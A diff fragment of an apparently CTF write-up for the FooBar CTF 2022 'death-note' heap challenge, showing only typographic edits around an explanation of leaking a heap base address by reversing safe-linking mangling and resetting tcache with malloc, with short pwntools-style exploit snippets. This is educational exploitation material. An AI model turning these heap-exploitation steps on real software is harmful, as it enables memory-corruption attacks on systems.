project-sekai-ctf/sekai.team/data/blog/foobar-ctf-2022/death-note.md

   (       0x1a1c2a0        >> 12) ^             0            = 0x1a1c
 ```

-So to recover the heap base address, we just simply do the reverse order (don't need to XOR) with the following payload:
+So to recover the heap base address, we just simply do the reverse order (don’t need to XOR) with the following payload:

 ```py
 heap = u64(show(0).ljust(8, b'\x00')) << 12
 log.success("Heap base: " + hex(heap))
 ```

 And we get the heap base address.
-Before we move on next stage, just malloc again to reset the state of tcache bin to null:
+Before we move on next stage, just `malloc()` again to reset the state of tcache bin to null:

 ```py
 add(0, 0x10, '{}'.format(0).encode()*8)